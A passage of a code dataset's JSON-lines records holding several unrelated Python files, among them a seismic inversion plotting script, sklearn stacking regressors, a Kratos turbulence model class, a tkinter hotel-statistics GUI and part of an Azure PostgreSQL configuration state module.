config_inv['plot']\n zmax = config_plot['zmax']\n vsmin, vsmax = config_plot['vs_lim']\n file_model_data = config_plot.get('model_data', None)\n file_model_output = config_plot.get(\"model_output\", \"model_output.txt\")\n dir_output = config_inv['dir_output']\n dir_output = os.path.join(dir_output, sid)\n file_data = '{:s}.txt'.format(sid)\n\n results = [np.load(dir_output + '/' + f) for f in os.listdir(dir_output)]\n misfit = np.asarray([r['fi'] for r in results])\n\n model_stat = np.asarray([r['mi'][:, 3] for r in results])\n model_0 = np.asarray([r['m0'][:, 3] for r in results])\n\n weight = np.exp(-misfit)\n\n if len(weight) == 1:\n ratio_show = 1\n else:\n ratio_show = config_plot['percentage_show'] * 0.01\n num_show = int(misfit.shape[0] * ratio_show)\n ind_sort = np.argsort(weight)[::-1][:num_show]\n weight = weight[ind_sort]\n weight /= np.sum(weight)\n model_stat = model_stat[ind_sort, :]\n\n if plot_init:\n model_stat = model_0[ind_sort, :]\n weight = np.ones_like(weight)\n weight /= np.sum(weight)\n file_model_data = None\n\n if zmax < 0.5:\n unit = 'm'\n km2m = 1000\n else:\n unit = 'km'\n km2m = 1\n\n plt.figure()\n\n file_model_init = config_inv['model_init']\n model_init = np.loadtxt(file_model_init)\n z = model_init[:, 1]\n hw = config_inv['init_half_width']\n vs = model_stat\n\n z_plot = np.append(z, zmax) * km2m\n wmax = np.amax(weight)\n\n labels = []\n handles = []\n for i in range(vs.shape[0]):\n vs_plot = np.append(vs[i, :], vs[i, -1])\n alpha = weight[i] / wmax * 0.2\n p1, = plt.step(vs_plot, z_plot, 'k-',\n alpha=alpha, linewidth=2)\n\n handles.append(p1)\n if plot_init:\n labels.append('initial model')\n else:\n 
labels.append('inverted model')\n\n ml = []\n sl = []\n zl = []\n for i in range(vs.shape[1]):\n mean, std = weighted_avg_and_std(vs[:, i], weight)\n ml.append(mean)\n sl.append(std)\n zl.append((z_plot[i] + z_plot[i + 1]) / 2.0)\n\n mp = ml[:] + [\n ml[-1],\n ]\n zp = z_plot[:]\n if not plot_init:\n p2, = plt.step(mp, zp, '-', c='r', alpha=0.8, linewidth=2)\n handles.append(p2)\n labels.append('estimated model')\n\n vs_init = model_init[:, 3]\n hw = config_inv['init_half_width']\n v1, v2 = vs_init - hw, vs_init + hw\n vs1_plot = np.append(v1, v1[-1])\n vs2_plot = np.append(v2, v2[-1])\n plt.step(vs1_plot,\n z_plot,\n '--',\n c='gray',\n alpha=0.8)\n plt.step(vs2_plot, z_plot, '--', c='gray', alpha=0.8)\n\n of = ObjectiveFunctionDerivativeUsed(config_inv, file_data)\n x = (np.asarray(ml) - v1) / (v2 - v1)\n model = of._update_model(x)\n std = np.asarray(sl).reshape(-1, 1)\n model = np.hstack((model, std))\n fmt = \"%5d%12.6f%12.6f%12.6f%12.6f%12.6f\"\n np.savetxt(file_model_output, model, fmt=fmt)\n print((\"{:>7s}\" + \"{:>12s}\" * 5).format('No.', 'z', 'rho', 'vs', 'vp',\n 'std'))\n for i in range(model.shape[0]):\n print((\"{:7.0f}\" + \"{:12.4f}\" * 5).format(*model[i, :]))\n\n if file_model_data:\n model_data = np.loadtxt(file_model_data)\n z = model_data[:, 1]\n z = np.append(z, [\n zmax,\n ]) * km2m\n vs = model_data[:, 3]\n vs = np.append(vs, [\n vs[-1],\n ])\n p3, = plt.step(vs,\n z,\n '-',\n c='b',\n alpha=0.6,\n linewidth=2)\n handles.append(p3)\n labels.append('data model')\n\n if plot_init:\n file_model_init = config_inv['model_init']\n model_init = np.loadtxt(file_model_init)\n z = model_init[:, 1]\n z = np.append(z, [\n zmax,\n ]) * km2m\n vs = model_init[:, 3]\n vs = np.append(vs, [\n vs[-1],\n ])\n p4, = plt.step(vs, z, 'r-', alpha=0.6)\n handles.append(p4)\n labels.append('reference model')\n\n plt.legend(handles, labels, loc='lower left')\n\n if plot_init:\n plt.title('initial model distribution')\n\n plt.xlim([vsmin, vsmax])\n plt.ylim([0, zmax * km2m])\n plt.xlabel('Vs (km/s)')\n plt.ylabel('Depth ({:s})'.format(unit))\n plt.gca().invert_yaxis()\n plt.tight_layout()\n if file_out:\n plt.savefig(file_out, dpi=300)\n if not no_show:\n plt.show()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='plot inversion result')\n parser.add_argument('-c', '--config', default='config_inv.yml')\n parser.add_argument('--data', help='data name')\n parser.add_argument('--plot_model', action='store_true')\n parser.add_argument('--plot_disp', action='store_true')\n parser.add_argument('--all_disp', action='store_true')\n parser.add_argument('--plot_init', action='store_true')\n parser.add_argument('--out', default=None,\n help='filename of output figure')\n parser.add_argument('--no_show', action='store_true')\n args = parser.parse_args()\n file_config = args.config\n dataname = args.data\n show_model = args.plot_model\n show_disp = args.plot_disp\n all_disp = args.all_disp\n show_init = args.plot_init\n file_out = args.out\n no_show = args.no_show\n\n with open(file_config, 'r') as fp:\n config = yaml.safe_load(fp)\n\n if show_model:\n plot_model(config, dataname, show_init, file_out, no_show)\n if show_disp:\n plot_disp(config, dataname, all_disp, file_out, no_show)\n","repo_name":"pan3rock/DisbaTomo","sub_path":"python/plot_inversion.py","file_name":"plot_inversion.py","file_ext":"py","file_size_in_byte":9477,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"44"} +{"seq_id":"25201045370","text":"#!/usr/bin/env 
python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 29 10:23:13 2018\n\n@author: hendrawahyu\n\"\"\"\n\nfrom sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone\nfrom sklearn.model_selection import KFold, cross_val_score, train_test_split\n\nimport numpy as np\n\n### Classifier Models ###\nclass Classifier(object):\n def __init__(self, models, seed = 0, params = None):\n params['random_state'] = seed\n self.models = models(**params)\n \n def train(self, X, y):\n self.models.fit(X, y)\n \n def predict(self, X):\n return self.models.predict(X)\n \n def fit(self,X,y):\n return self.models.fit(X,y)\n \n def feature_importances(self,X,y):\n print(self.models.fit(X,y).feature_importances_)\n\n\n### Stacking Regressor models ###\nclass StackingAveragedRegressor(BaseEstimator, RegressorMixin, TransformerMixin):\n def __init__(self, base_models, meta_model, n_folds=5):\n self.base_models = base_models\n self.meta_model = meta_model\n self.n_folds = n_folds\n \n # We again fit the data on clones of the original models\n def fit(self, X, y):\n self.base_models_ = [list() for x in self.base_models]\n self.meta_model_ = clone(self.meta_model)\n kfold = KFold(n_splits=self.n_folds, shuffle=True, random_state=156)\n \n # Train cloned base models then create out-of-fold predictions\n # that are needed to train the cloned meta-model\n out_of_fold_predictions = np.zeros((X.shape[0], len(self.base_models)))\n for i, model in enumerate(self.base_models):\n for train_index, holdout_index in kfold.split(X, y):\n instance = clone(model)\n self.base_models_[i].append(instance)\n instance.fit(X[train_index], y[train_index])\n y_pred = instance.predict(X[holdout_index])\n out_of_fold_predictions[holdout_index, i] = y_pred\n \n # Now train the cloned meta-model using the out-of-fold predictions as new feature\n self.meta_model_.fit(out_of_fold_predictions, y)\n return self\n \n #Do the predictions of all base models on the test data and use the averaged predictions as \n #meta-features for the final prediction which is done by the meta-model\n def predict(self, X):\n meta_features = np.column_stack([\n np.column_stack([model.predict(X) for model in base_models]).mean(axis=1)\n for base_models in self.base_models_ ])\n return self.meta_model_.predict(meta_features)\n\n\nclass StackingRetrainedRegressor(BaseEstimator, RegressorMixin, TransformerMixin):\n def __init__(self, base_models, meta_models, n_folds = 5, use_feat_secondary = False):\n self.base_models = base_models\n self.meta_models = meta_models\n self.n_folds = n_folds\n self.use_feat_secondary = use_feat_secondary\n \n def fit(self, X, y):\n self.base_models_ = [clone(x) for x in self.base_models]\n self.meta_models_ = clone(self.meta_models)\n kfold = KFold(n_splits = self.n_folds, shuffle = True)\n \n out_of_fold_predictions = np.zeros((X.shape[0], len(self.base_models)))\n \n for i, model in enumerate(self.base_models_):\n for train_idx, holdout_idx in kfold.split(X, y):\n instance = clone(model)\n instance.fit(X[train_idx], y[train_idx])\n out_of_fold_predictions[holdout_idx, i] = instance.predict(X[holdout_idx])\n \n # train meta-model\n if self.use_feat_secondary:\n self.meta_models_.fit(np.hstack((X, out_of_fold_predictions)), y)\n else:\n self.meta_models_.fit(out_of_fold_predictions, y)\n \n # retrain base models on all data\n for regr in self.base_models_:\n regr.fit(X, y)\n \n return self\n \n def predict(self, X):\n meta_features = np.column_stack([ regr.predict(X) for regr in self.base_models_])\n if 
self.use_feat_secondary:\n return self.meta_models_.predict(np.hstack((X, meta_features)))\n else:\n return self.meta_models_.predict(meta_features)\n \n\n \n ","repo_name":"hwahyu/Machine-Learning","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16654743214","text":"'''\npip install googletrans==4.0.0-rc1\n'''\nimport googletrans\n\ntranslator = googletrans.Translator()\n\nstr1 = \"행복하세요\"\nresult1 = translator.translate( str1, dest='en', src='auto' ) #src='auto'는 기본값이라 생략가능\nprint(f'행복하세요 => { result1.text }')\n\nstr2 = \"I am happy\"\nresult2 = translator.translate( str2, dest='ko', src='en' )\nprint(f'I am happy => { result2.text }')","repo_name":"grey920/book_40_examples_with_python","sub_path":"9.영어로된 문서를 한글로 자동번역/main9-1.py","file_name":"main9-1.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71914198213","text":"from abc import abstractmethod\n\n# import kratos\nimport KratosMultiphysics as Kratos\nimport KratosMultiphysics.FluidDynamicsApplication as KratosCFD\n\n# import formulation interface\nfrom KratosMultiphysics.RANSApplication.formulations.rans_formulation import RansFormulation\n\n# import utilities\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import CreateRansFormulationModelPart\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import CreateBlockBuilderAndSolver\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import InitializePeriodicConditions\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import GetBoundaryFlags\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import GetKratosObjectPrototype\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import CalculateNormalsOnConditions\nfrom KratosMultiphysics.RANSApplication.formulations.utilities import InitializeYPlusVariablesInConditions\n\nclass ScalarTurbulenceModelRansFormulation(RansFormulation):\n def __init__(self, model_part, settings):\n \"\"\"Scalar turbulence model formulation base class\n\n This solves the variable given in self.GetSolvingVariable(), using element and conditions\n having prefixes provided by self.GetElementNamePrefix() and self.GetConditionNamePrefix()\n\n If wall functions are used, then self.GetConditionNamePrefix() should return non-empty prefix\n otherwise it should be empty.\n\n Args:\n model_part (Kratos.ModelPart): ModelPart to be used in the formulation.\n settings (Kratos.Parameters): Settings to be used in the formulation.\n \"\"\"\n defaults = Kratos.Parameters(r\"\"\"{\n \"relative_tolerance\" : 1e-3,\n \"absolute_tolerance\" : 1e-5,\n \"max_iterations\" : 200,\n \"relaxation_factor\" : 0.5,\n \"echo_level\" : 2,\n \"linear_solver_settings\": {\n \"solver_type\" : \"amgcl\"\n },\n \"boundary_flags\": [\"INLET\", \"STRUCTURE\"]\n }\"\"\")\n\n settings.ValidateAndAssignDefaults(defaults)\n self.echo_level = settings[\"echo_level\"].GetInt()\n\n super().__init__(model_part, settings)\n\n @abstractmethod\n def GetSolvingVariable(self):\n pass\n\n @abstractmethod\n def GetElementNamePrefix(self):\n pass\n\n @abstractmethod\n def GetConditionNamePrefix(self):\n pass\n\n def PrepareModelPart(self):\n self.turbulence_model_part = CreateRansFormulationModelPart(\n self.GetComputingModelPart(),\n self.__class__.__name__,\n 
self.GetDomainSize(),\n self.element_name,\n self.condition_name)\n\n Kratos.Logger.PrintInfo(self.__class__.__name__,\n \"Created formulation model part.\")\n\n def Initialize(self):\n InitializeYPlusVariablesInConditions(self.GetBaseModelPart())\n CalculateNormalsOnConditions(self.GetBaseModelPart())\n\n settings = self.GetParameters()\n\n if (self.IsPeriodic()):\n InitializePeriodicConditions(\n self.GetBaseModelPart(),\n self.GetModelPart(),\n [self.GetSolvingVariable()])\n\n linear_solver_factory = GetKratosObjectPrototype(\"LinearSolverFactory\")\n linear_solver = linear_solver_factory(settings[\"linear_solver_settings\"])\n\n builder_and_solver = CreateBlockBuilderAndSolver(\n linear_solver,\n self.IsPeriodic(),\n self.GetCommunicator())\n\n convergence_criteria_type = GetKratosObjectPrototype(\"MixedGenericCriteria\")\n convergence_criteria = convergence_criteria_type([\n (self.GetSolvingVariable(),\n settings[\"relative_tolerance\"].GetDouble(),\n settings[\"absolute_tolerance\"].GetDouble())])\n\n if (self.is_steady_simulation):\n scheme = self.scheme_type(settings[\"relaxation_factor\"].GetDouble())\n else:\n scheme_type = GetKratosObjectPrototype(\"BossakRelaxationScalarScheme\")\n scheme = scheme_type(\n self.GetModelPart().ProcessInfo[Kratos.BOSSAK_ALPHA],\n settings[\"relaxation_factor\"].GetDouble(),\n self.GetSolvingVariable())\n\n solver_type = GetKratosObjectPrototype(\"ResidualBasedNewtonRaphsonStrategy\")\n self.solver = solver_type(\n self.GetModelPart(),\n scheme,\n convergence_criteria,\n builder_and_solver,\n settings[\"max_iterations\"].GetInt(),\n False,\n False,\n False)\n\n self.solver.SetEchoLevel(self.echo_level)\n convergence_criteria.SetEchoLevel(self.echo_level)\n\n super().Initialize()\n Kratos.Logger.PrintInfo(self.__class__.__name__, \"Initialized formulation\")\n\n def SolveCouplingStep(self):\n if (self.IsBufferInitialized()):\n self.ExecuteBeforeCouplingSolveStep()\n self.solver.Predict()\n self.solver.SolveSolutionStep()\n self.ExecuteAfterCouplingSolveStep()\n Kratos.Logger.PrintInfo(self.__class__.__name__, \"Solved formulation.\")\n return True\n\n return False\n\n def GetStrategy(self):\n return self.solver\n\n def SetTimeSchemeSettings(self, settings):\n if (settings.Has(\"scheme_type\")):\n scheme_type = settings[\"scheme_type\"].GetString()\n if (scheme_type == \"steady\"):\n self.is_steady_simulation = True\n elif (scheme_type == \"bdf2\" or scheme_type == \"bossak\"):\n self.is_steady_simulation = False\n else:\n raise Exception(\n \"Only \\\"steady\\\", \\\"bdf2\\\" and \\\"bossak\\\" scheme types supported. 
[ scheme_type = \\\"\"\n + scheme_type + \"\\\" ]\")\n else:\n raise Exception(\n \"\\\"scheme_type\\\" is missing in time scheme settings\")\n\n def GetMaxCouplingIterations(self):\n return 0\n\n def GetModelPart(self):\n return self.turbulence_model_part\n\n def SetStabilizationMethod(self, stabilization_method):\n self.element_name = self.GetElementNamePrefix()\n if (stabilization_method == \"algebraic_flux_corrected\"):\n self.element_name = self.element_name + \"AFC\"\n self.scheme_type = self._CreateAlgebraicFluxCorrectedSteadyScalarScheme\n elif (stabilization_method == \"residual_based_flux_corrected\"):\n self.element_name = self.element_name + \"RFC\"\n self.scheme_type = GetKratosObjectPrototype(\"SteadyScalarScheme\")\n elif (stabilization_method == \"non_linear_cross_wind_dissipation\"):\n self.element_name = self.element_name + \"CWD\"\n self.scheme_type = GetKratosObjectPrototype(\"SteadyScalarScheme\")\n else:\n raise Exception(\"Unsupported stabilization method\")\n\n def SetWallFunctionSettings(self, settings):\n self.condition_name = self.GetConditionNamePrefix()\n\n if (self.condition_name != \"\"):\n if (settings.Has(\"wall_function_region_type\")):\n wall_function_region_type = settings[\"wall_function_region_type\"].GetString()\n else:\n wall_function_region_type = \"logarithmic_region_only\"\n\n if (settings.Has(\"wall_friction_velocity_calculation_method\")):\n wall_friction_velocity_calculation_method = settings[\"wall_friction_velocity_calculation_method\"].GetString()\n else:\n wall_friction_velocity_calculation_method = \"velocity_based\"\n\n if (wall_function_region_type == \"logarithmic_region_only\"):\n if (wall_friction_velocity_calculation_method == \"velocity_based\"):\n self.condition_name = self.condition_name + \"UBasedWall\"\n elif (wall_friction_velocity_calculation_method ==\n \"turbulent_kinetic_energy_based\"):\n self.condition_name = self.condition_name + \"KBasedWall\"\n else:\n msg = \"Unsupported wall friction velocity calculation method. [ wall_friction_velocity_calculation_method = \\\"\" + wall_friction_velocity_calculation_method + \"\\\" ].\\n\"\n msg += \"Supported methods are:\\n\"\n msg += \"\\tvelocity_based\\n\"\n msg += \"\\tturbulent_kinetic_energy_based\\n\"\n raise Exception(msg)\n else:\n msg = \"Unsupported wall function region type provided. 
[ wall_function_region_type = \\\"\" + wall_function_region_type + \"\\\" ].\"\n msg += \"Supported wall function region types are:\\n\"\n msg += \"\\tlogarithmic_region_only\\n\"\n raise Exception(msg)\n\n def _CreateAlgebraicFluxCorrectedSteadyScalarScheme(self, relaxation_factor):\n if (self.IsPeriodic()):\n return GetKratosObjectPrototype(\"AlgebraicFluxCorrectedSteadyScalarScheme\")(relaxation_factor, GetBoundaryFlags(self.GetParameters()[\"boundary_flags\"]), KratosCFD.PATCH_INDEX)\n else:\n return GetKratosObjectPrototype(\"AlgebraicFluxCorrectedSteadyScalarScheme\")(relaxation_factor, GetBoundaryFlags(self.GetParameters()[\"boundary_flags\"]))","repo_name":"KratosMultiphysics/Kratos","sub_path":"applications/RANSApplication/python_scripts/formulations/turbulence_models/scalar_turbulence_model_rans_formulation.py","file_name":"scalar_turbulence_model_rans_formulation.py","file_ext":"py","file_size_in_byte":9289,"program_lang":"python","lang":"en","doc_type":"code","stars":906,"dataset":"github-code","pt":"44"} +{"seq_id":"72734569734","text":"'''a small Python 2 and 3 compatibility library'''\n\nimport os\nimport sys\n# get version\npy3 = (sys.version_info[0] >= 3)\npy2 = (not py3)\n\n# Note: avoid using 'x' mode when in py2 & pypy3\n# open\ntry: # py3 only\n FileExistsError\n FileNotFoundError\nexcept NameError: # py2/pypy3\n pypy3 = py3\n\n class FileExistsError(OSError):\n pass\n\n class FileNotFoundError(IOError):\n pass\n\nelse:\n pypy3 = False\n FileExistsError = FileExistsError # for import\n FileNotFoundError = FileNotFoundError # for import\n\nif py2:\n import codecs\n import warnings\n\n def open(file, mode='r', buffering=-1, encoding=None,\n errors=None, newline=None, closefd=True, opener=None):\n\n if newline is not None:\n warnings.warn('newline is not supported in py2')\n if not closefd:\n warnings.warn('closefd is not supported in py2')\n if opener is not None:\n warnings.warn('opener is not supported in py2')\n\n if 'x' in mode and os.path.exists(file):\n raise FileExistError(\"[Errno 17] File exists: '%s'\" % file)\n elif 'r' in mode and not os.path.exists(file):\n raise FileNotFoundError(\n \"[Errno 2] No such file or directory: '%s'\" % file)\n\n return codecs.open(filename=file, mode=mode, encoding=encoding,\n errors=errors, buffering=buffering)\nelif pypy3:\n\n def open(file, mode='r', *a, **k):\n if 'x' in mode:\n if os.path.exists(file):\n raise FileExistError(\"[Errno 17] File exists: '%s'\" % file)\n mode = mode.replace('x', 'w') # pypy3 does not support 'x'\n elif 'r' in mode:\n if not os.path.exists(file):\n raise FileNotFoundError(\n \"[Errno 2] No such file or directory: '%s'\" % file)\n\n return __builtins__.open(file, mode, *a, **k)\n\nelse:\n open = open # for import\n","repo_name":"TylerTemp/qstart","sub_path":"lib/tool/minsix.py","file_name":"minsix.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"4704805572","text":"#!/usr/bin/env python3\n# Tableau de pascal\n\ndef p1(l1: list):\n l2 = [1]\n n = len(l1)\n for k in range(1, n):\n l2.append(l1[k] + l1[k - 1])\n l2.append(1)\n return l2\n\n\ndef p2(n: int):\n l = [1]\n for i in range(n):\n print(p1(l))\n l = p1(l)\n\np2(10)\n","repo_name":"bc1bb/pieces-of-code","sub_path":"lycee/python/pascal.py","file_name":"pascal.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"35544324022","text":"from 
pathlib import Path\n\nfrom tkinter import Frame, Canvas, Entry, Text, Button, PhotoImage, messagebox, Tk, ttk\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom controller import *\n\nOUTPUT_PATH = Path(__file__).parent\nASSETS_PATH = OUTPUT_PATH / Path(\"./assets\")\n\n\ndef relative_to_assets(path: str) -> Path:\n return ASSETS_PATH / Path(path)\n\n\ndef about():\n About()\n\n\nclass About(Frame):\n def __init__(self, parent, controller=None, *args, **kwargs):\n Frame.__init__(self, parent, *args, **kwargs)\n self.parent = parent\n\n self.configure(bg=\"#FFFFFF\")\n\n notebook = ttk.Notebook(self)\n tab1 = self.create_tab(notebook, \"Income\")\n tab2 = self.create_tab_2(notebook, \"Check In/Out\")\n tab3 = self.create_tab_3(notebook, \"Room Type Income\")\n tab4 = self.create_tab_4(notebook, \"Service Type Income\")\n\n # Add the tabs to the Notebook\n notebook.add(tab1, text=\"Income\")\n notebook.add(tab2, text=\"Check In/Out\")\n notebook.add(tab3, text=\"Room Type Income\")\n notebook.add(tab4, text=\"Service Type Income\")\n\n # Pack the Notebook widget\n notebook.pack()\n\n\n def create_tab(self, parent, title):\n tab_frame = Frame(parent)\n tab_frame.configure(bg=\"#FFFFFF\")\n\n canvas = Canvas(\n tab_frame,\n bg=\"#FFFFFF\",\n height=500,\n width=797,\n bd=0,\n highlightthickness=0,\n relief=\"ridge\",\n )\n\n # Fetch data from the database\n months, total_bills = get_bill_value_group_by_month()\n\n # Create the bar chart\n fig, ax = plt.subplots(figsize=(7, 4))\n ax.bar(\n months,\n total_bills,\n color=\"#5E95FF\",\n width=0.5,\n edgecolor=\"#5E95FF\",\n linewidth=1,\n )\n ax.set_xlabel('Month')\n ax.set_ylabel('Total Bill Value')\n ax.set_title('Time Series Bar Chart of Total Bill Value')\n ax.set_xticklabels(months, rotation=45)\n\n # Create a FigureCanvasTkAgg object to display the chart in the Canvas widget\n canvas_widget = FigureCanvasTkAgg(fig, master=tab_frame)\n canvas_widget.draw()\n canvas_widget.get_tk_widget().pack()\n\n # Place the FigureCanvasTkAgg object within the Canvas widget\n canvas.create_window(0, 0, anchor='nw', window=canvas_widget.get_tk_widget())\n canvas.pack()\n\n return tab_frame\n\n def create_tab_2(self, parent, title):\n tab_frame = Frame(parent)\n tab_frame.configure(bg=\"#FFFFFF\")\n\n canvas = Canvas(\n tab_frame,\n bg=\"#FFFFFF\",\n height=500,\n width=797,\n bd=0,\n highlightthickness=0,\n relief=\"ridge\",\n )\n\n # Fetch data from the database\n months, total_check_ins, total_check_outs = get_total_check_in_check_out_group_by_month()\n # Create the multi-line chart\n fig, ax = plt.subplots(figsize=(7, 4))\n ax.plot(months, total_check_ins, color=\"#5E95FF\", linewidth=1, label=\"Check In\")\n ax.plot(months, total_check_outs, color=\"#FFA500\", linewidth=1, label=\"Check Out\")\n ax.set_xlabel('Month')\n ax.set_ylabel('Total Check In/Out')\n ax.set_title('Time Series Line Chart of Total Check In/Out')\n ax.set_xticklabels(months, rotation=45)\n ax.legend()\n\n # Create a FigureCanvasTkAgg object to display the chart in the Canvas widget\n canvas_widget = FigureCanvasTkAgg(fig, master=tab_frame)\n canvas_widget.draw()\n canvas_widget.get_tk_widget().pack()\n\n # Place the FigureCanvasTkAgg object within the Canvas widget\n canvas.create_window(0, 0, anchor='nw', window=canvas_widget.get_tk_widget())\n canvas.pack()\n\n return tab_frame\n\n def create_tab_3(self, parent, title):\n tab_frame = Frame(parent)\n tab_frame.configure(bg=\"#FFFFFF\")\n\n 
canvas = Canvas(\n tab_frame,\n bg=\"#FFFFFF\",\n height=500,\n width=797,\n bd=0,\n highlightthickness=0,\n relief=\"ridge\",\n )\n\n # Fetch data from the database\n months, deluxe_bills, normal_bills = get_total_bill_value_each_room_type_group_by_month()\n # create mullti-bar chart\n fig, ax = plt.subplots(figsize=(7, 4))\n ax.bar(\n months,\n deluxe_bills,\n color=\"#5E95FF\",\n width=0.5,\n edgecolor=\"#5E95FF\",\n linewidth=1,\n label=\"Deluxe\",\n )\n ax.bar(\n months,\n normal_bills,\n color=\"#FFA500\",\n width=0.5,\n edgecolor=\"#FFA500\",\n linewidth=1,\n label=\"Normal\",\n )\n ax.set_xlabel('Month')\n ax.set_ylabel('Total Bill Value')\n ax.set_title('Time Series Bar Chart of Total Bill Value Each Room Type')\n ax.set_xticklabels(months, rotation=45)\n ax.legend()\n\n # Create a FigureCanvasTkAgg object to display the chart in the Canvas widget\n canvas_widget = FigureCanvasTkAgg(fig, master=tab_frame)\n canvas_widget.draw()\n canvas_widget.get_tk_widget().pack()\n\n # Place the FigureCanvasTkAgg object within the Canvas widget\n canvas.create_window(0, 0, anchor='nw', window=canvas_widget.get_tk_widget())\n canvas.pack()\n\n return tab_frame\n\n def create_tab_4(self, parent, title):\n tab_frame = Frame(parent)\n tab_frame.configure(bg=\"#FFFFFF\")\n\n canvas = Canvas(\n tab_frame,\n bg=\"#FFFFFF\",\n height=500,\n width=797,\n bd=0,\n highlightthickness=0,\n relief=\"ridge\",\n )\n\n # Fetch data from the database\n months, service_values = get_total_service_value_each_type_group_by_month()\n # create stacked area chart\n fig, ax = plt.subplots(figsize=(7, 4))\n service_names = list(service_values.keys())\n list_of_values = list(service_values.values())\n ax.stackplot(months, *list_of_values, labels=service_names)\n ax.set_xlabel('Month')\n ax.set_ylabel('Total Service Value')\n ax.set_title('Time Series Stacked Area Chart of Total Service Value Each Type')\n ax.set_xticklabels(months, rotation=45)\n ax.legend()\n\n # Create a FigureCanvasTkAgg object to display the chart in the Canvas widget\n canvas_widget = FigureCanvasTkAgg(fig, master=tab_frame)\n canvas_widget.draw()\n canvas_widget.get_tk_widget().pack()\n\n # Place the FigureCanvasTkAgg object within the Canvas widget\n canvas.create_window(0, 0, anchor='nw', window=canvas_widget.get_tk_widget())\n canvas.pack()\n\n return tab_frame","repo_name":"nukima/hotel_management","sub_path":"gui/main_window/about/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15298082235","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAzure Resource Manager (ARM) PostgreSQL Server Configuration Operations State Module\n\n.. versionadded:: 2.0.0\n\n.. versionchanged:: 4.0.0\n\n:maintainer: <devops@eitr.tech>\n:configuration: This module requires Azure Resource Manager credentials to be passed via acct. 
Note that the\n authentication parameters are case sensitive.\n\n Required provider parameters:\n\n if using username and password:\n * ``subscription_id``\n * ``username``\n * ``password``\n\n if using a service principal:\n * ``subscription_id``\n * ``tenant``\n * ``client_id``\n * ``secret``\n\n Optional provider parameters:\n\n **cloud_environment**: Used to point the cloud driver to different API endpoints, such as Azure GovCloud.\n Possible values:\n * ``AZURE_PUBLIC_CLOUD`` (default)\n * ``AZURE_CHINA_CLOUD``\n * ``AZURE_US_GOV_CLOUD``\n * ``AZURE_GERMAN_CLOUD``\n\n Example acct setup for Azure Resource Manager authentication:\n\n .. code-block:: yaml\n\n azurerm:\n default:\n subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617\n tenant: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF\n client_id: ABCDEFAB-1234-ABCD-1234-ABCDEFABCDEF\n secret: XXXXXXXXXXXXXXXXXXXXXXXX\n cloud_environment: AZURE_PUBLIC_CLOUD\n user_pass_auth:\n subscription_id: 3287abc8-f98a-c678-3bde-326766fd3617\n username: fletch\n password: 123pass\n\n The authentication parameters can also be passed as a dictionary of keyword arguments to the ``connection_auth``\n parameter of each state, but this is not preferred and could be deprecated in the future.\n\n\"\"\"\n# Python libs\nfrom __future__ import absolute_import\nimport logging\n\nlog = logging.getLogger(__name__)\n\nTREQ = {\n \"present\": {\n \"require\": [\n \"states.azurerm.resource.group.present\",\n \"states.azurerm.postgresql.server.present\",\n ]\n }\n}\n\n\nasync def present(\n hub, ctx, name, server_name, resource_group, value, connection_auth=None, **kwargs,\n):\n \"\"\"\n .. versionadded:: 2.0.0\n\n .. versionchanged:: 4.0.0\n\n Ensures that a specific configuration setting exists with the given value for a specific PostgreSQL server. A list\n of configuration settings that can be updated for the given server can be found by using the list_by_server\n operation below. Additionally, all possible values for each individual configuration setting can be found\n using that module.\n\n :param name: The name of the server configuration setting.\n\n :param server_name: The name of the server.\n\n :param resource_group: The name of the resource group. The name is case insensitive.\n\n :param value: The value of the configuration setting.\n\n :param connection_auth: A dict with subscription and authentication parameters to be used in connecting to the\n Azure Resource Manager API.\n\n Example usage:\n\n .. 
code-block:: yaml\n\n Ensure configuration setting exists:\n azurerm.postgresql.configuration.present:\n - name: my_rule\n - server_name: my_server\n - resource_group: my_rg\n - value: config_value\n\n \"\"\"\n ret = {\"name\": name, \"result\": False, \"comment\": \"\", \"changes\": {}}\n action = \"create\"\n\n if not isinstance(connection_auth, dict):\n if ctx[\"acct\"]:\n connection_auth = ctx[\"acct\"]\n else:\n ret[\n \"comment\"\n ] = \"Connection information must be specified via acct or connection_auth dictionary!\"\n return ret\n\n config = await hub.exec.azurerm.postgresql.configuration.get(\n ctx=ctx,\n name=name,\n server_name=server_name,\n resource_group=resource_group,\n azurerm_log_level=\"info\",\n **connection_auth,\n )\n\n if \"error\" not in config:\n action = \"update\"\n if value:\n if value != config.get(\"value\"):\n ret[\"changes\"][\"value\"] = {\"old\": config.get(\"value\"), \"new\": value}\n\n if not ret[\"changes\"]:\n ret[\"result\"] = True\n ret[\"comment\"] = \"Configuration Setting {0} is already present.\".format(\n name\n )\n return ret\n\n if ctx[\"test\"]:\n ret[\"result\"] = None\n ret[\"comment\"] = \"Configuration Setting {0} would be updated.\".format(name)\n return ret\n\n if ctx[\"test\"]:\n ret[\"comment\"] = \"Configuration Setting {0} would be created.\".format(name)\n ret[\"result\"] = None\n return ret\n\n config_kwargs = kwargs.copy()\n config_kwargs.update(connection_auth)\n\n 